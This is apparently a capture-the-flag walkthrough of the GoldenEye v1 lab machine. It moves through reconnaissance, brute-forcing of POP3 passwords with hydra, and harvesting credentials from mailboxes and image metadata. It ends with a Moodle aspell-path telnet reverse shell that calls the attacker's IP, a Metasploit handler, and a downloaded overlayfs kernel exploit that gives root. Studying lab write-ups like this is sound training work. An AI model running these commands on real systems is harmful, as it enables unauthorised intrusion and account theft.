root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48: -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 12:03 BST
Nmap scan report for 10.0.133.48
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 10.0.133.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds
The web server and version are returned.
Nikto scan of web server:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# nickto -h http://severnaya-station.com/gnocertdir/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.133.48
+ Target Hostname: 10.0.133.48
+ Target Port: 80
+ Start Time: 2018-08-03 12:03:09 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2018-08-03 12:03:27 (GMT1) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Visiting the website at http://10.0.133.48/ displays an animated faux login page to "Severnaya Auxiliary Control Station", looking at the page source and subsequently terminal.js javascript code responsible for the animation effect reveals some encoded credentials.
.. image:: ./images/goldeneye/GoldenEye_main_page.png
:alt: goldeneye main page
.. code-block:: html
Severnaya Auxiliary Control Station
****TOP SECRET ACCESS****
Accessing Server Identity
Server Name:....................
GOLDENEYE
User: UNKNOWN
Naviagate to /sev-home/ to login" } ]; // //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes // var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent; var i = 0, isTag, text; (function type() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + ` `; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) return type(); setTimeout(type, 60); })(); } This character encoding looks like HTML encoded ASCII values. Decode them using python 3's unescape function in the html library: .. raw:: html
root@kali:~/vulnhub/goldeneyev1# python3
Python 3.6.6 (default, Jun 27 2018, 14:44:17)
[GCC 8.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import html
>>> a = ' 'InvincibleHack3r'
>>> html.unescape(a)
'InvincibleHack3r'
Boris's password is learned: InvincibleHack3r
The faux loging teletype instructs us to navigate to http://10.0.133.48/sev-home, this page requires authentication (HTTP basic auth), try to authenticate with Boris's credentials:
.. image:: ./images/goldeneye/GoldenEye_sev-home_auth.png
:alt: goldeneye login page
.. image:: ./images/goldeneye/GoldenEye_loggedin.png
:alt: goldeneye main page
The credentials work and we are presented with a page informing us to:
"Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system"
The pop3 service is running on non default (not 110 POP3 or 995 POP3S) ports which have already been discovered by our initial port scan (55006 and 55007).
Nikto discovered a file called /splashAdmin.php "Cobalt Qube 3 admin is running" , visiting this page returns Boris's blog which contains information that may prove useful in future.
.. image:: ./images/goldeneye/GoldenEye_borisblog.png
:alt: goldeneye boris blog page
The background is hideous and makes the text hard to read so read the source instead:
.. code-block:: html
:linenos:
:emphasize-lines: 25,26,27
Cobalt Qube 3 has been decommissioned
We can use this page to put up team photos, discussion, etc. Natalya is not allowed to post here though --Boris
Here's me with my new sniper rifle.
Boris why are you wearing shorts in that photo? You do realize you're stationed above the Arctic circle, correct?
BTW your favorite pen broke, but I replaced it with a new special one.
Natalya "best coder" S.
"License to Kill - Complex Grenade Launchers - No Oddjob" - Unknown"
Greetings ya'll! GoldenEye Admin here.
For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag.
I've replaced GCC with this throughout the GolenEye systems.
Boris, no arguing about this, GCC has been removed and that's final!
Also why have you been chatting with Xenia in private Boris? She's a new contractor that you've never met before? Are you sure you've never worked together...?
-Admin
Janus was here
From this page and the others discovered we can create a list of possible users on the server: Boris Natalya Oddjob Admin Xenia Janus The line about replacing GCC with "the Alternative to GCC, which FreeBSD uses" (Clang) is also noteworthy. POP3 on port 55006 ------------------ nmap scan of POP3 on 55006 .. raw:: html
root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55006
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
Nmap scan report for 10.0.133.48
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE CAPA USER PIPELINING TOP SASL(PLAIN) RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 10.0.133.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds
The server listening on port 55006 is expecting an SSL/TLS encrypted session to be negotiated so we cannot connect to it manually using ``telnet`` to investigate. ``openssl`` can instead be used to connect, negotiate encryption and allow communication with the POP3 server using appropriate verbs.
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# openssl s_client --connect 10.0.133.48:55006
CONNECTED(00000003)
depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
verify return:1
... (certificate chain redacted)
---
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
LIST
-ERR Unknown command.
We learn the server is running a Dovecot version that does not appear to be vulnerable to any known exploits. We can connect to and issue POP3 commands to the server to try and authenticate with the credentials previously discovered, unfortunately this does not result in success.
POP3S on port 55007
-------------------
nmap scan of POP3 on 55007
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55007
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
Nmap scan report for 10.0.133.48
Host is up (0.00065s latency).
PORT STATE SERVICE VERSION
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL PIPELINING TOP STLS SASL(PLAIN) CAPA USER AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 10.0.133.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds
It is very likely that the same Dovecot server instance is listening on port 55006 and 55007 and just providing a TLS encrypted connection on the former. This is a common configuration for an email server, also the banners and versions as discovered by nmap are the same.
The POP3 service on port 55007 does not use encryption so ``telnet`` can be used to connect and issue POP3 commands directly.
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.485090948 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
LIST
-ERR Unknown command.
Seeing as its almost certainly the same back end Dovecot server we are connecting to it makes little sense to preform further interactions on port 55006 as this will net the same results as connecting on port 55007 just with the added overhead and complexity of encryption.
Plan of attack
==============
A strong hint that details required to further compromise the machine can be found on users email accounts was discovered on the GNO (/sev-home/) website. A list of possible users has been enumerated along with a means to verify whether they have email accounts on the server.
Given that the Dovecot server version does not appear to be vulnerable to any known exploits that may be useful to access users email it is likely that the account passwords must be brute forced using a wordlist of commonly used passwords or one generated form the pages & banners on GoldenEye that have been discovered.
Exploitation
============
Enumerate POP3 accounts
-----------------------
From names found on the page at http://10.0.133.48/splashAdmin.php the following list of possible user names was created:
* Boris
* Natalya
* Oddjob
* Admin
* Xenia
* Janus
Run `smtp-user-enum` to discover if these users have email accounts on the server:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -U users.txt -t 10.0.133.48
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 6
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Aug 7 15:40:09 2018 #########
10.0.133.48: Natalya exists
10.0.133.48: Boris exists
######## Scan completed at Tue Aug 7 15:40:09 2018 #########
2 results.
6 queries in 1 seconds (6.0 queries / sec)
Script done on 2018-08-07 15:40:11+01:00
Brute force users passwords with hydra
--------------------------------------
A wordlist was generated using `cewl` from the all the web pages so far discovered, mutated using `john` and then used with `hydra` to attempt to brute force guess the password for the root, boris and natalya user accounts but this was not successful.
user list:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# cat users.txt
root
Boris
Natalya
Brute force the password using hydra with the fasttrack wordlist:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# hydra -: users.txt -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 16:42:39
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 666 login tries (l:3/p:222), ~42 tries per task
[DATA] attacking pop3://10.0.133.48:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 586 to do in 00:08h, 16 active
[STATUS] 64.00 tries/min, 192 tries in 00:03h, 474 to do in 00:08h, 16 active
[55007][pop3] host: 10.0.133.48 login: Boris password: secret1!
[STATUS] 70.43 tries/min, 493 tries in 00:07h, 173 to do in 00:03h, 16 active
[55007][pop3] host: 10.0.133.48 login: Natalya password: bird
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 16:51:19
Boris and Natalya's email account credentials are discovered.
Read Boris's email
------------------
Telnet to the Dovecot server, login as boris and retrieve his email:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path:
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here.
I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path:
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path:
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye.
Place them in a hidden file within the root directory of this server then remove from this email.
There can only be one set of these acces codes, and we need to secure them for the final execution.
If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
.
QUIT
+OK Logging out.
Connection closed by foreign host.
No credentials are found but a strong hint that there may be some in natalya's account is given in that there is not DLP (Data Loss Prevention) in place on the email server.
Read Natalya's email
--------------------
Telnet to the Dovecot server, login as boris and retrieve his email:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path:
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training.
I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path:
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you.
As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
QUIT
+OK Logging out.
Connection closed by foreign host.
A new service is discovered at severnaya-station.com/gnocertdir with instructions to edit /etc/hosts so that the domain resolves to the servers IP (10.0.133.48). It is likely that the site is an Apache virtual host hence the request header must include the domain and not IP so that Apache serves the correct content.
Add domain to /etc/hosts
------------------------
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# echo "10.0.133.48 severnaya-station.com" >> /etc/hosts
Once the mapping of domain to IP is added to /etc/hosts we can browse to the URL
.. image:: ./images/goldeneye/GoldenEye_moodle.png
:alt: goldeneye moodle
and login with Xenia's credentials discovered in Natalyas emails.
.. image:: ./images/goldeneye/GoldenEye_moodle_login_xenia.png
:alt: goldeneye moodle login xenia
Exploring Xenia's Moodle account
--------------------------------
A message from "Dr Doak" was discovered, the following suggets Dr Doak may have an email account on the server also: "If you have any questions message me via email, not here."
.. image:: ./images/goldeneye/GoldenEye_moodle_doak_msg.png
:alt: goldeneye moodle doak msg
`smtp-user-enum` confirms Dr. Doak does indeed have an email account on the server
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -u doak -t 10.0.133.48
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Aug 7 18:52:18 2018 #########
10.0.133.48: doak exists
######## Scan completed at Tue Aug 7 18:52:18 2018 #########
1 results.
1 queries in 1 seconds (1.0 queries / sec)
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# hydra -l doak -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:53:56
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.0.133.48:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.0.133.48 login: doak password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 18:56:16
Username: doak
Password: goat
Reading Doak's email
--------------------
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path:
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for ; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
QUIT
+OK Logging out.
Connection closed by foreign host.
Dr Doak's Moodle credentials are discovered.
Exploring Dr. Doak's Moodle account
-----------------------------------
A file named "s3cret.txt" is discovered on his Moodle file storage:
.. image:: ./images/goldeneye/GoldenEye_moodle_doak_file.png
:alt: goldeneye moodle doaks file
The file contains:
.. code-block:: text
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
The message directs us to an image file located at: http://severnaya-station.com/dir007key/for-007.jpg maybe the admin credentials are stored here?
download this file and read the EXIF meta data stored in the image file using `exif`
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# root@kali:~/vulnhub/goldeneyev1# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Image Description |eFdpbnRlcjE5OTV4IQ==
Manufacturer |GoldenEye
Resolution Unit |Inch
Software |linux
Artist |For James
YCbCr Positioning |Centred
X-Resolution |72
Y-Resolution |72
Exif Version |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment |For 007
FlashPixVersion |FlashPix Version 1.0
Colour Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
The highlighted Image Description field looks suspiciously like a base64 encoded string, lets decode it:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# echo -n "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!
Logging into the admin users Moodle account
-------------------------------------------
The admin user has much greater privileges on the Moodle installation and after some exploration a feature of the application was discovered that may allow remote code execution, RCE, on the server.
.. image:: ./images/goldeneye/GoldenEye_aspell_path.png
:alt: goldeneye moodle aspell path
The path is set to:
.. code-block:: text
sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'
Breaking this command down it looks like a reverse shell, more specifically metasploits "Unix Command Shell, Double Reverse TCP (telnet)" (cmd/unix/reverse):
* `sh -c` execute commands read from the string that follows
* The parentheses () group the command that follows and execute it in a subshell
* `sleep 4062` piped to the telnet command delays the command from returning
* the first telnet connection is created and it's output is piped to while loop that tries to execute sh then breaks, STDERR redirected to STDOUT
* pipe this to another telnet connection whos output is redirected to /dev/null (>/dev/null 2>&1)
* `&` background the command
This builds a reverse shell using the two telnet sessions
@TODO investigate further how this works
@TODO why does a simple reverse shell using bash not work?
Low Privilege shell
===================
Modify the path to aspell changing the IP in the telnet connection to that of our kali box:
.. code-block:: shell
sh -c '(sleep 10|telnet 10.0.133.20 4444|while : ; do sh && break; done 2>&1|telnet 10.0.133.20 4444 >/dev/null 2>&1 &)'
.. image:: ./images/goldeneye/GoldenEye_aspell_path2.png
:alt: goldeneye moodle aspell path
The spellchecker used by TinyMCE editor must also be set to "PSpellShell"
.. image:: ./images/goldeneye/GoldenEye_set_aspell.png
:alt: goldeneye moodle aspell path
netcat cannot be used to receive this reverse shell as it works over two telnet connections, metasploits multihandler is used instead:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(multi/handler) > set LHOST payload cmd/unix/reverseORTLPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST 10.0.133.20
LHOST => 10.0.133.20
msf exploit(multi/handler) > run
Trigger the reverse shell by editing a page with TinyMCE and running a spellcheck:
.. image:: ./images/goldeneye/GoldenEye_spell_check.png
:alt: goldeneye spell check
Reverse shell connects back:
.. raw:: html
[*] Started reverse TCP double handler on 10.0.133.20:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hkIz4NyjVhH7lGXN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "hkIz4NyjVhH7lGXN\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.133.20:4444 -> 10.0.133.48:36916) at 2018-08-08 14:22:18 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege escalation
====================
Python was used to spawn an interactive shell from the initial telnet double reverse shell:
.. raw:: html
python -c 'import pty; pty.spawn("/bin/sh");'
An interesting directory is discovered in the Apache default vhosts webroot `/var/www/html/006-final/xvf7-flag/`. Navigating to http://10.0.133.48/006-final/xvf7-flag/ displays the "Flag captured" page even though we do not yet have root.
.. image:: ./images/goldeneye/GoldenEye_flag.png
:alt: goldeneye flag
After further enumeration from the low privilege shell there does not appear to be a way to escalate to root privileges without resorting to kernel exploits.
.. raw:: html
$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/lsb-release
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
`searchsploit` returns an exploit that should work with the Linux distribution and kernel version on the server:
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# searchsploit ubuntu 14.04 3.13
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Use a modified version of: "Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation"
URL: https://www.exploit-db.com/exploits/37292/
The exploit must be slightly modified so that the shell script uses ``clang`` instead of ``gcc`` to compile the binary as ``gcc`` is not available (recall the following text "For programming I highly prefer the Alternative to GCC, which FreeBSD uses..." found in the splashAdmin.php page).
The overlayfs implementation in the linux (aka Linux kernel) package before
3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions
for file creation in the upper filesystem directory, which allows local
users to obtain root access by leveraging a configuration in which
overlayfs is permitted in an arbitrary mount namespace.
.. code-block:: c
:linenos:
#include
root@kali:~/vulnhub/goldeneyev1# sed -i 's\gcc\clang\g' oly.c
Serve the modified exploit code on a python SimpleHTTPServer so that it can be downloaded on the target.
.. raw:: html
root@kali:~/vulnhub/goldeneyev1# root@kali:~/vulnhub/goldeneyev1# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.133.48 - - [08/Aug/2018 17:17:22] "GET /oly.c HTTP/1.1" 200 -
Download and compile the exploit on GoldenEye:
.. raw:: html
$ wget http://10.0.133.20/oly.c
wget http://10.0.133.20/oly.c
--2018-08-08 09:17:22-- http://10.0.133.20/oly.c
Connecting to 10.0.133.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3863 (3.8K) [text/plain]
Saving to: 'oly.c'
100%[======================================>] 3,863 --.-K/s in 0s
2018-08-08 09:17:22 (723 MB/s) - 'oly.c' saved [3863/3863]
$ clang oly.c -o oly
clang oly.c -o oly
oly.c:61:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
oly.c:73:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
oly.c:78:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
oly.c:84:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
oly.c:94:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
$ ls
ls
oly oly.c
Run the exploit and escalate to root:
.. raw:: html
$ ./oly
./oly
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Discover the flag hidden in /root
.. code-block:: text
# cat /root/.flag.txt
cat /root/.flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
Since the /006-final/xvf7-flag/ path was already discovered (see above) with the low privilege shell theres no need to go back to it.